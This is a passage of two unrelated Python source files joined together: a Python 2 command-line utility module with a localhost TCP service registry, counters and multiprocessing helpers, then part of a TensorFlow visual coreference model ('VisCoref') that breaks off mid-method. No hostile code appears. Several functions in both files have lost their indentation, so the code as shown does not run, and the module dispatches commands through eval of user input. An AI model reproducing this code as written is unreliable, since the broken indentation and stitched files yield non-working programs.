                self.__args = self.__parser.parse_args()
            self.is_parsed = True;
        if self.__args.log:
            format='%(asctime)s %(levelname)8s [%(filename)18s:%(lineno)04d]: %(message)s'
            if self.__args.log=='debug':
                logging.basicConfig(level=logging.DEBUG, format=format)
                logging.debug('log level set to [%s]'%(self.__args.log));
            elif self.__args.log=='info':
                logging.basicConfig(level=logging.INFO, format=format)
                logging.info('log level set to [%s]'%(self.__args.log));
            elif self.__args.log=='error':
                logging.basicConfig(level=logging.ERROR, format=format)
                logging.info('log level set to [%s]'%(self.__args.log));
            else:
                logging.error('log mode invalid! [%s]'%self.__args.log)
        return self.__args
    @property
    def args(self):
        # Lazy parse on first access (skips the logging setup of init_arg).
        if not self.is_parsed:
            self.__args = self.__parser.parse_args()
            self.is_parsed = True;
        return self.__args;
def function_curve(min_x, min_y, interval, function):
    """Plot function(x) for x in [min_x, min_y) sampled every `interval`
    (blocks until the plot window is closed)."""
    import numpy as np
    import matplotlib.pyplot as plt
    xs = np.arange(min_x, min_y, interval)
    ys = [function(v) for v in xs]
    line, = plt.plot(xs, ys)
    plt.show()
def foreach_line(fd=sys.stdin, percentage=False):
    """Yield each line of `fd` with its trailing newline stripped.

    With percentage=True (seekable files only) a progress line is printed to
    stderr whenever the integer percentage advances.  (Python 2 code.)
    """
    if percentage:
        # Measure file size by seeking to the end and restoring the position.
        cur_pos = fd.tell()
        fd.seek(0, 2)
        file_size = fd.tell()
        fd.seek(cur_pos)
        old_perc = 0
    while 1:
        line = fd.readline()
        if line == '':
            break  # EOF
        if percentage:
            cur_pos = fd.tell()
            perc = int(100.0 * cur_pos / file_size)
            if perc>old_perc:
                old_perc = perc
                print >> sys.stderr, '%c[foreach_line] process %d%% (%d/%d)' % (
                    13, perc, cur_pos, file_size)
        yield line.strip('\n')
def foreach_row(fd=sys.stdin, min_fields_num=-1, seperator='\t', percentage=False):
    """Yield each line of `fd` split by `seperator`, skipping rows with fewer
    than `min_fields_num` fields (when that is > 0).

    With percentage=True (seekable files only) a progress line is printed to
    stderr whenever the integer percentage advances.  (Python 2 code.)
    """
    if percentage:
        # Measure file size by seeking to the end and restoring the position.
        cur_pos = fd.tell()
        fd.seek(0, 2)
        file_size = fd.tell()
        fd.seek(cur_pos)
        old_perc = 0
    while 1:
        line = fd.readline()
        if line == '':
            break  # EOF
        if percentage:
            cur_pos = fd.tell()
            perc = int(100.0 * cur_pos / file_size)
            if perc>old_perc:
                old_perc = perc
                print >> sys.stderr, '%c[foreach_line] process %d%% (%d/%d)' % (
                    13, perc, cur_pos, file_size)
        arr = line.strip('\n').split(seperator)
        if min_fields_num>0 and len(arr)<min_fields_num:
            continue
        yield arr
def dict_from_str(s, l1_sep=';', l2_sep='='):
    """Parse a two-level string like 'a=1;b=2' into {'a': '1', 'b': '2'}.

    Args:
        s: the input; non-str inputs yield {}.
        l1_sep: separator between items.
        l2_sep: separator between key and value inside an item.

    Items that do not split into exactly key and value are logged and skipped.
    """
    dct = {}
    if not isinstance(s, str):
        return {}
    for item in s.split(l1_sep):
        r = item.split(l2_sep)
        if len(r)!=2:
            # BUGFIX: the format string had a %s placeholder but no argument,
            # which made the logging call itself error out.
            logging.error('[dict_from_str]: [%s] is not a valid item.', item)
            continue
        dct[r[0]] = r[1]
    return dct
def dict_from_file(fd=sys.stdin, process=None, key_process=None, seperator='\t'):
    """Build a dict from a separated-value stream.

    Each row's key is row[0] (or key_process(row) when given); its value is
    the tab-join of the remaining fields (or process(row) when given).
    Later rows overwrite earlier ones with the same key.
    """
    result = {}
    for row in foreach_row(fd, seperator=seperator):
        key = key_process(row) if key_process else row[0]
        value = process(row) if process else '\t'.join(row[1:])
        result[key] = value
    return result
def echo(input_text):
    """Echo handler for BasicService: acknowledge the received text."""
    return ''.join(['ACK: ', input_text])
def sock_recv(sock):
    """Receive one length-prefixed message from `sock`.

    Wire format: an 8-char ASCII decimal length header (HEADER_LENGTH), then
    the payload.  Returns the payload, or None if the peer closed before
    sending a header.  (Python 2 code: recv chunks concatenated as str.)
    """
    d = sock.recv(HEADER_LENGTH)
    if len(d)==0:
        return None  # connection closed
    data_len = int(d)
    data = ''
    while 1:
        # Read at most 4096 bytes per recv until the payload is complete.
        n = min(4096, data_len)
        d = sock.recv(n)
        if not d:
            break  # peer closed early; return what we have
        data_len -= len(d)
        data += d
        if data_len<=0:
            break
    return data
def sock_send(sock, data):
    """Send one length-prefixed message: an 8-char ASCII decimal length header
    followed by the payload (counterpart of sock_recv)."""
    header = '%8d' % len(data)
    sock.sendall(header)
    sock.sendall(data)
def simple_query(query, ip='127.0.0.1', port=12345):
    """Open a TCP connection, send one framed query and return the framed
    reply (see sock_send/sock_recv for the wire format)."""
    sys.stderr.write('SEEK_TO: %s:%s\n' % (ip, port))
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((ip, port))
    sock_send(conn, query)
    reply = sock_recv(conn)
    conn.close()
    return reply
def detect(ip='127.0.0.1', port=12345):
    """Return True iff a service answering the liveness probe runs at ip:port.

    (Python 2 `except E, v` syntax; any error during the probe counts as
    "not alive".)
    """
    try:
        ret = simple_query(DETECTIVE_MSG, ip, port)
        if ret != 'YES':
            return False
    except Exception, msg:
        sys.stderr.write('detect err: %s\n' % msg)
        return False
    return True
def simple_query_by_name(query, name, ip='127.0.0.1'):
    """Resolve a service port by registered name via the manager service
    (port 8769), then forward `query` to it.  Returns None on lookup failure."""
    ret = simple_query('SEEK\t%s' % name, ip, port=8769)
    parts = ret.split('\t')
    if parts[0] != 'OK':
        sys.stderr.write('seek name failed! [%s]' % ret)
        return None
    return simple_query(query, ip, int(parts[1]))
class BasicService:
    """Single-threaded TCP request/response service.

    Handlers are plugged in via set_init / set_process / set_timer_deamon;
    run() accepts connections in a loop, answers the liveness probe
    (DETECTIVE_MSG) itself, and passes everything else to the process
    handler.  (Python 2 code: `except E, v` syntax.)
    """
    def __init__(self):
        self.__handler_init = None
        self.__handler_process = None
        self.__handler_timer_process = None
        self.__timer = 0.0
    def set_init(self, h_init):
        # Callable invoked once before the accept loop starts.
        self.__handler_init = h_init
    def set_process(self, h_process):
        # Callable(data) -> response (or falsy for no reply).
        self.__handler_process = h_process
    def set_timer_deamon(self, h_process, seconds=60.0):
        '''
        set a process which will be called each time interval.
        '''
        self.__handler_timer_process = h_process
        self.__timer = seconds
    def run_with_name(self, name, desc='No description.', ip='127.0.0.1', port=12345):
        # Register with the ManagerService on port 8769, then serve.
        cmd = 'REGEDIT\t%s\t%d\t%s' % (name, port, desc)
        ret = simple_query(cmd, ip, port=8769)
        arr = ret.split('\t')
        if arr[0] != 'OK':
            sys.stderr.write('SET NAME FAILED! [%s]' % ret)
            return
        self.run(ip, port)
    def run(self, ip='127.0.0.1', port=12345):
        # Blocking accept loop; never returns normally.
        if self.__handler_init:
            sys.stderr.write('init..\n')
            self.__handler_init()
        self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.__sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
        self.__sock.bind( (ip, port) )
        self.__sock.listen(32)
        sys.stderr.write('listen : %s:%d\n' % (ip, port))
        last_time = time.time()
        try:
            while 1:
                # Fire the timer handler first when its interval elapsed.
                if self.__handler_timer_process:
                    dt = time.time() - last_time
                    if dt >= self.__timer:
                        try:
                            self.__handler_timer_process()
                        except Exception, msg:
                            sys.stderr.write('error in time_handler: %s\n' % msg)
                        last_time = time.time()
                # Accept with a 1s timeout so the timer handler keeps
                # running even when no client connects.
                self.__sock.settimeout(1);
                try:
                    clisock, (remote_host, remote_port) = self.__sock.accept()
                except socket.timeout, msg:
                    continue
                try:
                    data = sock_recv(clisock)
                    if data == DETECTIVE_MSG:
                        # Answer the liveness probe directly.
                        sock_send(clisock, 'YES')
                    else:
                        sys.stderr.write('[%s:%s] connected dl=%d\n' % (remote_host, remote_port, len(data)))
                        if self.__handler_process:
                            response = self.__handler_process(data)
                            if response:
                                sock_send(clisock, response)
                except Exception, msg:
                    # Per-connection failures are logged but do not stop
                    # the service.
                    sys.stderr.write('err [%s]!\n' % msg)
                    traceback.print_stack()
                    traceback.print_exc()
                    continue
                finally:
                    clisock.close()
        finally:
            sys.stderr.write('byebye.\n')
            self.__sock.close()
class ManagerService:
    """Name registry for BasicService instances, listening on port 8769.

    Keeps name -> port and name -> description maps, persists them to
    service_info.txt, and prunes dead services every 5 seconds via the
    liveness probe.  Commands (see process()): SEEK, REGEDIT, INFO.
    (Python 2 code: iteritems, the file() builtin.)
    """
    def __init__(self):
        self.__name_dct = {}
        self.__desc_dct = {}
        self.__recover()
        self.__svr = BasicService()
        self.__svr.set_process(self.process)
        self.__svr.set_timer_deamon(self.deamon_process, 5)
    def run(self):
        # Serve forever on the well-known manager port.
        self.__svr.run(port=8769)
    def deamon_process(self):
        '''
        check whether each service is alive; drop dead ones and persist.
        '''
        sys.stderr.write('detect: %s\n' % time.asctime())
        del_names = []
        for name, port in self.__name_dct.iteritems():
            alive = detect(port=port)
            if not alive:
                sys.stderr.write('%s : %s[%d] is dead.\n' % (time.asctime(), name, port))
                del_names.append(name)
        for name in del_names:
            del self.__name_dct[name]
            del self.__desc_dct[name]
        self.__backup()
    def process(self, cmd):
        '''
        3 type(s) of cmd:
            'SEEK[\t][name]' => 'OK\tPORT' or 'ERR\tNOT_FOUND'
            'REGEDIT[\t][name][\t][port][\t][desc]' => 'OK' or 'ERR\tmsg'
            'INFO' => 'OK\tname info.'
        '''
        # Strip characters that would corrupt the INFO wire format.
        cmd = cmd.replace('\n', '')
        cmd = cmd.replace('###', '')
        cmd = cmd.replace('||', '')
        arr = cmd.split('\t')
        if arr[0] == 'SEEK':
            if len(arr)!=2:
                return 'ERR\tpara_num=%d' % len(arr)
            name = arr[1]
            if name not in self.__name_dct:
                return 'ERR\tNOT_FOUND'
            return 'OK\t%d' % self.__name_dct[name]
        elif arr[0] == 'REGEDIT':
            if len(arr)!=4:
                return 'ERR\tpara_num=%d' % len(arr)
            name, port, desc = arr[1:4]
            if ':' in name:
                return 'ERR\tINVALID_NAME_NO_:_'
            port = int(port)
            self.__name_dct[name] = port
            self.__desc_dct[name] = desc
            return 'OK'
        elif arr[0] == 'INFO':
            # name||port||desc### for each registered service.
            info = ''
            for name, port in self.__name_dct.iteritems():
                desc = self.__desc_dct.get(name, '')
                info += '%s||%s||%s###' % (name, port, desc)
            return 'OK\t%s' % info
    def __recover(self):
        # Reload the registry persisted by __backup(); silently skip if absent.
        try:
            f = file('service_info.txt')
        except:
            sys.stderr.write('no backup info.\n')
            return
        for l in f.readlines():
            arr = l.strip('\n').split('\t')
            if len(arr)!=3:
                continue
            name, port, desc = arr
            port = int(port)
            if name not in self.__name_dct:
                self.__name_dct[name] = port
                self.__desc_dct[name] = desc
    def __backup(self):
        # Persist the registry so it survives restarts.
        f = file('service_info.txt', 'w')
        for name, port in self.__name_dct.iteritems():
            desc = ''
            if name in self.__desc_dct:
                desc = self.__desc_dct[name]
            # BUGFIX: the third column used to write `name` again instead of
            # `desc`, so descriptions were lost across restarts.
            f.write('%s\t%d\t%s\n' % (name, port, desc))
        f.close()
class CounterObject:
    """Accumulates tags and per-key value lists, serializable as JSON.

    str(obj) dumps the state; loads() restores it from such a dump.
    """

    def __init__(self):
        # '__tag__' holds the tag list; every other key holds a value list.
        self.__store = {'__tag__': []}

    def tag(self, t):
        """Append a tag."""
        self.__store['__tag__'].append(t)

    def kv(self, key, value):
        """Append `value` to the list stored under `key`."""
        self.__store.setdefault(key, []).append(value)

    def __str__(self):
        return json.dumps(self.__store)

    def loads(self, s):
        """Replace the state from a JSON string produced by __str__()."""
        self.__store = json.loads(s)
class MapperCounter:
    """Key -> count accumulator with a dump() in 'key<TAB>count' lines.
    (Python 2 only: print statement, iteritems.)"""
    def __init__(self):
        self.__dct = {}
    def inc(self, key, inc=1):
        # Increment `key` by `inc`, creating it at 0 first.
        if key not in self.__dct:
            self.__dct[key] = 0
        self.__dct[key] += inc
    def dump(self, stream, sort=False):
        # NOTE(review): `stream` is accepted but unused -- output always goes
        # to stdout via the print statement.
        if sort:
            # Descending by count.
            for key, value in sorted(self.__dct.iteritems(), key=lambda x:-x[1]):
                print '%s\t%s' % (key, value)
        else:
            for key, value in self.__dct.iteritems():
                print '%s\t%s' % (key, value)
def __test_basic_service():
    # Manual smoke test: serve an echo service registered under 'ECHO'
    # (blocks forever; requires the ManagerService on port 8769).
    svr = BasicService()
    svr.set_process(echo)
    svr.run_with_name('ECHO', desc='This is a echo service.')
class MPProcessor:
    """Run `functor(cur_i, proc_num)` over proc_num shares; each share's
    stdout is redirected to ./<stdout_dir>/part-NNNNN.

    NOTE(review): proc_num-1 child processes are spawned and the calling
    process runs the last share itself; that last share writes to
    part-<proc_num> rather than part-<proc_num-1>, so the part numbering has
    a gap -- confirm this is intended before relying on file names.
    """
    def __init__(self, functor, proc_num, stdout_dir='mp_out'):
        self.functor = functor
        self.proc_num = proc_num
        self.processes = [];
        self.stdout_dir=stdout_dir;
        self.stdout_fn = [];
        for i in range(proc_num-1):
            self.processes.append(Process(target=self._inner_func, args=(i, )));
            out_fn = './%s/part-%05d'%(self.stdout_dir, i)
            self.stdout_fn.append(out_fn);
        # Output file for the share run in the calling process.
        out_fn = './%s/part-%05d'%(self.stdout_dir, self.proc_num)
        self.stdout_fn.append(out_fn);
        return
    def _inner_func(self, cur_i):
        # Swap stdout to this share's part file for the functor's duration.
        old_stdout = sys.stdout;
        out_fn = self.stdout_fn[cur_i];
        logging.info('Process[%d] reset stdout to %s'%(cur_i, out_fn));
        sys.stdout = open( out_fn, 'w' )
        logging.info('Process[%d] begin to process.'%cur_i);
        self.functor(cur_i, self.proc_num);
        sys.stdout = old_stdout;
        logging.info('Process[%d] processes over.'%cur_i);
    def process_all(self):
        ''' START => JOIN.
        '''
        for process in self.processes:
            process.start();
        # Run one share in the calling process as well.
        self._inner_func(self.proc_num-1);
        for process in self.processes:
            process.join();
class Timer:
    """Accumulating stopwatch: each begin()/end() pair adds one span to a
    running total. cost_time() reports the last span; total_time()/qps()
    report aggregates across all spans since clear().
    """
    def __init__(self):
        self.clear()
    def begin(self):
        # Start (or restart) a timing span.
        self.__begin_time = time.time()
    def end(self):
        # Close the current span and fold it into the running totals.
        self.__end_time = time.time()
        self.__total_time += self.cost_time()
        self.__counter += 1
    def cost_time(self):
        # Duration of the most recent begin()..end() span, in seconds.
        # NOTE(review): raises TypeError if called before a full span.
        return self.__end_time - self.__begin_time
    def total_time(self):
        # Sum of all completed spans since the last clear().
        return self.__total_time
    def qps(self):
        # Completed spans per second of measured time.
        # NOTE(review): ZeroDivisionError when no time has accumulated.
        qps = self.__counter / self.__total_time
        return qps
    def clear(self):
        # Reset to the pristine state: no spans recorded.
        self.__begin_time = None
        self.__end_time = None
        self.__counter = 0
        self.__total_time = 0
    def log(self, stream=sys.stderr, name=None, output_qps=False):
        # One-line summary (Python 2 "print >> stream" chevron syntax).
        # NOTE(review): the sys.stderr default is bound at def time.
        qps_info = ''
        if output_qps:
            qps_info = 'QPS=%.3f' % (self.qps())
        if name:
            print >> stream, '[Timer][%s]: %.3f(s) %s' % (name, self.cost_time(), qps_info)
        else:
            print >> stream, '[Timer]: %.3f(s) %s' % (self.cost_time(), qps_info)
class MTItemProcessor(MPProcessor):
    """MPProcessor specialization that shards an item set across workers.

    Items are assigned by `item % proc_num == worker_index`; each worker's
    stdout goes to its own part-file, and merge_stdout() replays every
    part-file to the real stdout afterwards.

    NOTE(review): sharding uses `it % self.proc_num`, so items in
    `proc_set` are assumed to be integers -- confirm with callers.
    """
    def __init__(self,
            proc_set, functor, proc_num, stdout_dir):
        MPProcessor.__init__(self, functor, proc_num, stdout_dir);
        self.proc_set = proc_set
        # Wrap the per-item functor in a sharding shell; MPProcessor calls
        # self.functor with (worker_index, proc_num).
        self.inner_func = functor
        self.functor = self._shell_functor
        return ;
    def _shell_functor(self, cur_i, proc_num):
        # Process every item assigned to this worker; an error on one item
        # is reported to stderr and does not stop the shard.
        print >> sys.stderr, 'Process: %d' % cur_i
        for it in self.proc_set:
            if it % self.proc_num == cur_i:
                # hit this processor.
                try:
                    self.inner_func(it);
                except Exception, e:
                    print >> sys.stderr, e
    def merge_stdout(self):
        # Concatenate all part-files to the real stdout, in worker order.
        logging.info('MTP: merge stdout');
        line_cnt = 0;
        for fn in self.stdout_fn:
            fl = open(fn, 'r');
            line = fl.readline();
            while line:
                line=line.rstrip('\n');
                print line;
                line_cnt += 1;
                line = fl.readline()
            fl.close();
        logging.info('MTP: merge over! %d lines written.'%line_cnt);
##############################################################################
# Part II: CMD definition.
# How to add a CMD:
# def CMD_xx:
# ''' doc.
# '''
# # your code.
#
# xx will be command name.
# doc will be the help doc as cmd.
#
##############################################################################
def CMD_random(argv):
'''Generate random lines from stdin.
Params:
random [random_num]
'''
random_num = 10
if len(argv)>0:
random_num = int(argv[1])
print >> sys.stderr, 'Random_num = %d' % random_num
rd = RandomItemGenerator(random_num)
for line in foreach_line():
rd.feed(line)
for item in rd.result():
print item
def CMD_mgrservice(argv):
    '''Run the basic_service manager.
    '''
    # Start the service-name manager; blocks until it exits.
    manager = ManagerService()
    manager.run()
def CMD_show(argv):
'''Show all the commands.
'''
l = sys.modules['__main__'].__dict__.keys()
for key in l:
if key.find('CMD_') == 0:
print ' %s: ' % key.replace('CMD_', '')
f = eval(key)
if f.__doc__ is None:
print ' [NO_DOC]'
print
else:
print ' %s' % (f.__doc__.replace('\n', '\n '))
def CMD_counter(argv):
    '''Run counter job.
    -i : output int.
    --mapper : run as mapper mode.
    -c [int] : cut threshold.
    '''
    # Parse flags out of the raw argument list.
    output_int = False
    arg_set = set(argv)
    cut_num = 0
    mapper_mode = False
    if '-i' in arg_set:
        # output as integer.
        output_int = True
    if '--mapper' in arg_set:
        mapper_mode = True
    for arg in arg_set:
        if arg.find('-c') == 0:
            # "-cN": groups whose accumulated total is below N are dropped.
            cut_num = int(arg[2:])
    if mapper_mode:
        # Mapper: count identical stdin lines, emit "key<TAB>count".
        ct = MapperCounter()
        while 1:
            line = sys.stdin.readline()
            if line == '':
                break
            ct.inc(line.strip('\n'))
        ct.dump(sys.stdout)
    else:
        # reducer.
        # Reducer: input is "key<TAB>value" grouped by key (as after a
        # sort); sum runs of equal keys and emit totals >= cut_num.
        last_key = None
        acc_value = 0
        while 1:
            line = sys.stdin.readline()
            if line == '':
                break
            arr = line.strip('\n').split('\t')
            if len(arr)!=2:
                # Malformed line: skip.
                continue
            key, value = arr
            if output_int:
                value = int(value)
            else:
                value = float(value)
            if key != last_key:
                # Key changed: flush the finished group before resetting.
                if last_key:
                    if acc_value >= cut_num:
                        print '%s\t%s' % (last_key, acc_value)
                last_key = key
                acc_value = 0
            acc_value += value
        # Flush the final group.
        if last_key:
            if acc_value >= cut_num:
                print '%s\t%s' % (last_key, acc_value)
def CMD_test_conf(argv):
cp = VarConfig()
cp.read(argv, throw_exception=False)
for sec in cp.sections():
print '[%s]' % sec
options = cp.options(sec)
for k in options:
try:
v = cp.get(sec, k)
print '%s.%s=%s' % (sec, k, v)
except:
print '%s.%s [error]' % (sec, k)
continue
print
def CMD_xfind(argv):
    '''
    xfind: do set-operation in files.
    load dict from file(B), read data from stdin(A), make set-operation(find, A_B)
    xfind -f filename [-h] [-o <opeartion>] [-a --field_A] [-b --field_B] [-s --seperator <'\\t'>]
    '''
    # Declare and parse command-line options.
    a = Arg('load dict from file(B), read data from stdin(A), make set-operation(find, A_B)')
    a.str_opt('filename', 'f', 'input key file as [B]')
    a.str_opt('operation', 'o', 'operations, support find(A in B), A_B(A minus B)', default='find')
    a.str_opt('field_A', 'a', 'which row of A(input stream) will be treated as key, start at 1', default='1')
    a.str_opt('field_B', 'b', 'which row of B(key_file) will be treated as key, start at 1', default='1')
    a.str_opt('seperator', 's', 'seperator, default is tab.', default='\t')
    opt = a.init_arg(argv)
    # Convert 1-based user-facing column numbers to 0-based indices.
    field_B = int(opt.field_B) - 1
    field_A = int(opt.field_A) - 1
    # Build the key set B: key column -> whole (re-joined) row.
    keydict = dict_from_file(file(opt.filename), process=lambda x:'\t'.join(x), key_process=lambda x:x[field_B], seperator=opt.seperator)
    logging.info('Dict loaded. size=%d' % len(keydict))
    for row in foreach_row(sys.stdin, seperator=opt.seperator):
        if len(row)<=field_A:
            # Row too short to contain the key column; skip it.
            continue
        if opt.operation == 'find':
            # Intersection: emit rows of A whose key appears in B.
            if row[field_A] in keydict:
                print opt.seperator.join(row)
        elif opt.operation == 'A_B':
            # Difference: emit rows of A whose key does NOT appear in B.
            if row[field_A] not in keydict:
                print opt.seperator.join(row)
def CMD_sendmail(argv):
'''
send a file as mail to somebody.
sendmail <receiver> <filename> <title>
'''
if len(argv)!=3:
print 'sendmail <receiver> <filename> <title>'
return
receiver, filename, title = argv
s = MailSender()
content = ''.join(file(filename).readlines())
s.send(receiver, title, content)
def CMD_dimdiff(argv):
    '''
    dimdiff: compare the diff between two DimInfo file.
    dimdiff <filename1> <filename2>
    '''
    # Load both dimension summaries, then diff the second against the first.
    base = DimInfo()
    base.read(file(argv[0]))
    other = DimInfo()
    other.read(file(argv[1]))
    other.compare(base)
def CMD_dimshow(argv):
    '''
    dimshow: show dim info of file.
    dimshow <filename>
    '''
    # Load the file's dimension summary and print it to stderr.
    info = DimInfo()
    info.read(file(argv[0]))
    info.debug(sys.stderr)
if __name__=='__main__':
    logging.basicConfig(level=logging.INFO)
    # The following bare string is a no-op usage note (kept verbatim).
    '''
    pydev.py <command>
    command-list:
        list:
            list all the availble command.
    '''
    if len(sys.argv)<=1:
        print (
'''Usage:
    pydev.py <command>
    you can use 'pydev.py show' to get all available command.
''')
        sys.exit(-1)
    # Dispatch "pydev.py <cmd> args..." to CMD_<cmd>(args).
    # NOTE(review): eval() on user input; an unknown command raises
    # NameError rather than printing usage -- confirm this is intended.
    com = eval('CMD_' + sys.argv[1])
    ret = com(sys.argv[2:])
    sys.exit(ret)
|
model.py | from __future__ import absolute_import
from __future__ import division
import os
import math
import json
import threading
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
import h5py
import random
import util
import coref_ops
import metrics
class VisCoref(object):
  def __init__(self, config):
    """Build the VisCoref model: embedding tables, the padded input
    queue, the prediction/loss graph, and the training op.

    Args:
      config: dict-like experiment configuration (paths, sizes, flags).
    """
    self.config = config
    # Pretrained word embeddings (context + head); the head table may
    # share the context table's cache.
    self.context_embeddings = util.EmbeddingDictionary(config["context_embeddings"])
    self.head_embeddings = util.EmbeddingDictionary(config["head_embeddings"], maybe_cache=self.context_embeddings)
    self.char_embedding_size = config["char_embedding_size"]
    self.char_dict = util.load_char_dict(config["char_vocab_path"])
    self.max_span_width = config["max_span_width"]
    self.lm_layers = self.config["lm_layers"]
    self.lm_size = self.config["lm_size"]
    self.use_im = self.config["use_im"]
    # Map image doc_key -> detected-object label tokens.
    im_obj_labels = [json.loads(line) for line in open(self.config["im_obj_label_path"], "r")]
    self.id2cat = {int(d["doc_key"]):d["sentences"][0] for d in im_obj_labels}
    if self.use_im:
      self.lm_obj_file = h5py.File(self.config["lm_obj_path"], "r")
      self.im_emb_size = self.config["im_emb_size"]
    # visual baseline
    self.use_im_fc = self.config["use_im_fc"]
    if self.use_im_fc:
      self.im_fc_file = h5py.File(self.config["im_fc_feat_path"], "r")
      self.im_fc_feat_size = self.config["im_fc_feat_size"]
      self.im_fc_emb_size = self.config["im_fc_emb_size"]
      self.vis_weight = self.config["vis_weight"]
    # Negative candidate pool: NPs sampled from other documents.
    self.num_cdd_pool = self.config["num_cdd_pool"]
    self.lm_cdd_file = h5py.File(self.config["lm_cdd_path"], "r")
    with open(self.config["cdd_path"]) as f:
      self.cdd_nps = [json.loads(jsonline) for jsonline in f.readlines()]
    self.eval_data = None # Load eval data lazily.
    self.lm_file = h5py.File(self.config["lm_path"], "r")
    print(f'Loading elmo cache from {self.config["lm_path"]}')
    # One (dtype, shape) spec per queued tensor; order must match the
    # list returned by tensorize_example.
    input_props = []
    input_props.append((tf.string, [None, None])) # Tokens.
    input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings.
    input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings.
    input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for cap.
    input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for dial.
    input_props.append((tf.int32, [None, None, None])) # Character indices.
    input_props.append((tf.int32, [None])) # Text lengths.
    input_props.append((tf.int32, [None])) # Speaker IDs.
    input_props.append((tf.bool, [])) # Is training.
    input_props.append((tf.int32, [None])) # Gold starts.
    input_props.append((tf.int32, [None])) # Gold ends.
    input_props.append((tf.int32, [None])) # Cluster ids.
    input_props.append((tf.int32, [None])) # caption candidate starts.
    input_props.append((tf.int32, [None])) # caption candidate ends.
    input_props.append((tf.int32, [None])) # Text lengths cdd.
    input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings cdd.
    input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings cdd.
    input_props.append((tf.int32, [None, None, None])) # Character indices cdd.
    input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for cdd.
    input_props.append((tf.string, [None, None])) # Tokens cdd.
    input_props.append((tf.int32, [None])) # Text lengths obj.
    input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings obj.
    input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings obj.
    input_props.append((tf.int32, [None, None, None])) # Character indices obj.
    input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for obj.
    input_props.append((tf.string, [None, None])) # Tokens obj.
    input_props.append((tf.bool, [])) # Has object.
    # NOTE(review): self.im_fc_feat_size is only assigned when use_im_fc
    # is true, yet it is read here unconditionally -- confirm configs
    # always set use_im_fc, or this raises AttributeError.
    input_props.append((tf.float32, [self.im_fc_feat_size])) # Image features.
    self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
    dtypes, shapes = zip(*input_props)
    # Padding queue: batches are padded to the max shape in each dim.
    queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
    self.enqueue_op = queue.enqueue(self.queue_input_tensors)
    self.input_tensors = queue.dequeue()
    self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
    self.global_step = tf.Variable(0, name="global_step", trainable=False)
    self.reset_global_step = tf.assign(self.global_step, 0)
    self.max_eval_f1 = tf.Variable(0.0, name="max_eval_f1", trainable=False)
    # Exponentially decayed learning rate with gradient clipping.
    learning_rate = tf.train.exponential_decay(self.config["learning_rate"], self.global_step,
      self.config["decay_frequency"], self.config["decay_rate"], staircase=True)
    trainable_params = tf.trainable_variables()
    gradients = tf.gradients(self.loss, trainable_params)
    gradients, _ = tf.clip_by_global_norm(gradients, self.config["max_gradient_norm"])
    optimizers = {
      "adam" : tf.train.AdamOptimizer,
      "sgd" : tf.train.GradientDescentOptimizer
    }
    optimizer = optimizers[self.config["optimizer"]](learning_rate)
    self.train_op = optimizer.apply_gradients(zip(gradients, trainable_params), global_step=self.global_step)
  def start_enqueue_thread(self, session):
    """Start a daemon thread that endlessly tensorizes training examples
    and feeds them into the input queue via `session`."""
    with open(self.config["train_path"]) as f:
      train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
    def _enqueue_loop():
      while True:
        # Reshuffle each pass; seeding with (random_seed + global_step)
        # makes the order reproducible for a given resume point.
        global_step = session.run(self.global_step)
        random.seed(self.config["random_seed"] + global_step)
        random.shuffle(train_examples)
        for example in train_examples:
          tensorized_example = self.tensorize_example(example, is_training=True)
          feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
          # Blocks when the PaddingFIFOQueue is full.
          session.run(self.enqueue_op, feed_dict=feed_dict)
    enqueue_thread = threading.Thread(target=_enqueue_loop)
    enqueue_thread.daemon = True
    enqueue_thread.start()
def restore(self, session, step='max'):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() if "module/" not in v.name]
saver = tf.train.Saver(vars_to_restore)
if step == 'max':
path = "model.max.ckpt"
else:
path = "model-" + step
checkpoint_path = os.path.join(self.config["log_dir"], path)
print(f"Restoring from {checkpoint_path}")
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def load_lm_embeddings(self, doc_key):
if self.lm_file is None:
return np.zeros([0, 0, self.lm_size, self.lm_layers])
file_key = doc_key.replace("/", ":")
group_cap = self.lm_file[file_key + ':cap']
num_candidates = len(list(group_cap.keys()))
candidates = [group_cap[str(i)][...] for i in range(num_candidates)]
if len(candidates) > 0:
lm_emb_cap = np.zeros([len(candidates), max(c.shape[0] for c in candidates), self.lm_size, self.lm_layers])
for i, c in enumerate(candidates):
lm_emb_cap[i, :c.shape[0], :, :] = c
else:
# to avoid empty lm_emb_cap
lm_emb_cap = np.zeros([1, 1, self.lm_size, self.lm_layers])
group = self.lm_file[file_key]
num_sentences = len(list(group.keys()))
sentences = [group[str(i)][...] for i in range(1, num_sentences + 1)]
lm_emb_dial = np.zeros([len(sentences), max(s.shape[0] for s in sentences), self.lm_size, self.lm_layers])
for i, s in enumerate(sentences):
lm_emb_dial[i, :s.shape[0], :, :] = s
return [lm_emb_cap, lm_emb_dial]
def load_lm_embeddings_cdd(self, examples):
candidates = [self.lm_cdd_file[e['doc_key']]['0'][...] for e in examples]
lm_emb_cdd = np.zeros([len(candidates), max(c.shape[0] for c in candidates), self.lm_size, self.lm_layers])
for i, c in enumerate(candidates):
lm_emb_cdd[i, :c.shape[0], :, :] = c
return lm_emb_cdd
def load_lm_embeddings_obj(self, objs):
